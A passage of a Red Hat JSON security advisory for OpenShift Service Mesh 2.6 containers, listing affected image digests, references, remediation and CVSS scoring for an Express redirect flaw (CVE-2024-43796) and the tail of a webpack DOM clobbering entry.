"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
